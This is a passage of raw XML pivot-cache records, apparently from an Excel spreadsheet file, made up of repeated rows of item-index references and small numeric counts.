    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1186"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1187"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1187"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1187"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1187"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1187"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1187"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1187"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1187"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1187"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1187"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="1"/>
    <x v="1187"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1187"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="24"/>
    <x v="1187"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1187"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1188"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1188"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1188"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1188"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1188"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1188"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1188"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1188"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1188"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1188"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1188"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1188"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="30"/>
    <x v="1188"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="30"/>
    <x v="1188"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1189"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1189"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1189"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1189"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="7"/>
    <x v="1189"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="4"/>
    <x v="1189"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="11"/>
    <x v="1189"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="25"/>
    <x v="1189"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="3"/>
    <x v="1189"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1189"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1189"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1189"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="1189"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1189"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="762"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="3"/>
    <x v="762"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1190"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1190"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1190"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1190"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="6"/>
    <x v="1190"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="1190"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="1190"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="1190"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="15"/>
    <x v="1190"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1190"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="3"/>
    <x v="1190"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="2"/>
    <x v="1190"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="1190"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1190"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1191"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1191"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1191"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1191"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1191"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1191"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="1191"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1191"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1191"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1191"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1191"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="3"/>
    <x v="1191"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="1191"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1191"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1192"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1192"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1192"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1192"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1192"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1192"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="3"/>
    <x v="1192"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1192"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="1"/>
    <x v="1192"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1192"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="5"/>
    <x v="1192"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1192"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="1192"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1192"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1193"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="2"/>
    <x v="1193"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="2"/>
    <x v="1193"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="40"/>
    <x v="1193"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1193"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="1193"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="1193"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1193"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1193"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1193"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1193"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="40"/>
    <x v="1193"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="1193"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1193"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1194"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1194"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1194"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1194"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1194"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1194"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="1194"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1194"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1194"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1194"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="2"/>
    <x v="1194"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="10"/>
    <x v="1194"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="1194"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1194"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1195"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1195"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1195"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1195"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1195"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1195"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="1195"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1195"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="1"/>
    <x v="1195"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="10"/>
    <x v="1195"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1195"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1195"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="1195"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1195"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="1"/>
    <x v="1196"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="1"/>
    <x v="1196"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="11"/>
    <x v="1196"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1196"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1196"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1196"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1196"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1196"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1196"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1196"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1196"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1196"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="1196"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1196"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="12"/>
    <x v="1196"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1196"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="12"/>
    <x v="1196"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="1196"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="1196"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1197"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1197"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1197"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1197"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1197"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1197"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="1197"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1197"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1197"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1197"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="2"/>
    <x v="1197"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1197"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="30"/>
    <x v="1197"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1197"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1198"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1198"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1198"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1198"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="1198"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="1198"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="5"/>
    <x v="1198"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="4"/>
    <x v="1198"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1198"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1198"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="7"/>
    <x v="1198"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1198"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="1198"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1198"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1199"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1199"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1199"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1199"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1199"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1199"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="1199"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="1199"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1199"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="1"/>
    <x v="1199"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="8"/>
    <x v="1199"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="12"/>
    <x v="1199"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="1199"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1199"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1200"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1200"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1200"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1200"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1200"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1200"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="3"/>
    <x v="1200"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1200"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1200"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1200"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="1"/>
    <x v="1200"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1200"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="30"/>
    <x v="1200"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1200"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1201"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1201"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1201"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1201"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1201"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1201"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="3"/>
    <x v="1201"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1201"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1201"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1201"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1201"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1201"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="1201"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1201"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1202"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1202"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1202"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1202"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="4"/>
    <x v="1202"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="1202"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="1202"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1202"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1202"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1202"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="4"/>
    <x v="1202"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1202"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="27"/>
    <x v="1202"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1202"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="3"/>
    <x v="1203"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="3"/>
    <x v="1203"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1203"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1203"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="1203"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1203"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="1203"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="1203"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1203"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="2"/>
    <x v="1203"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="1"/>
    <x v="1203"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1203"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="1203"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1203"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1204"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1204"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1204"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1204"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1204"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1204"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="1204"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="1204"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1204"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1204"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="3"/>
    <x v="1204"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="6"/>
    <x v="1204"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="1204"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="2"/>
    <x v="1204"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1205"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1205"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1205"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1205"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1205"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1205"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="21"/>
    <x v="1205"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="5"/>
    <x v="1205"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="1"/>
    <x v="1205"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1205"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1205"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1205"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="1205"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="3"/>
    <x v="1205"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="1"/>
    <x v="1205"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1206"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1206"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1206"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1206"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1206"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1206"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="1206"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1206"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1206"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1206"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1206"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1206"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="1206"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1206"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1207"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1207"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1207"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1207"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1207"/>
  </r>
  <r>
